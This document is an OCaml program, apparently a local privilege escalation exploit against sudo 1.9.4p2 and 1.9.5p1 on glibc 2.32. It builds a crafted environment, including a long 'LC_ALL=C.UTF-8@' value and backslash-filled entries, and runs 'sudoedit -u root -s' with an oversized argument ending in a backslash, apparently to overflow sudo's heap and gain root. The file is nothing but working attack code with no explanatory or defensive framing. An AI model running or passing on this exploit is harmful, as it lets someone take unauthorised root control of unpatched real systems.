(* 1.9.4p2 and 1.9.5p1
with glibc 2.32 (name switch services vers.)
*)

let prepenv () =
        let env = Array.make (2155) "\\" in
        let lc = String.make 120 '0' in

        env.(63)   <- "X/X \\";
        env.(2153) <- "BB";
        env.(2154) <- "LC_ALL=C.UTF-8@" ^ lc;
        env

let prepargs () =
        let arga = String.make 0x70 '0' in
        let arglist = [
"sudoedit"; "-u"; "root"; "-s"; arga ^ "\\"
] in
        let args = Array.of_list arglist in
        args

let env = prepenv ()
let args = prepargs ()
let run = Unix.execve "/usr/local/bin/sudoedit" args env
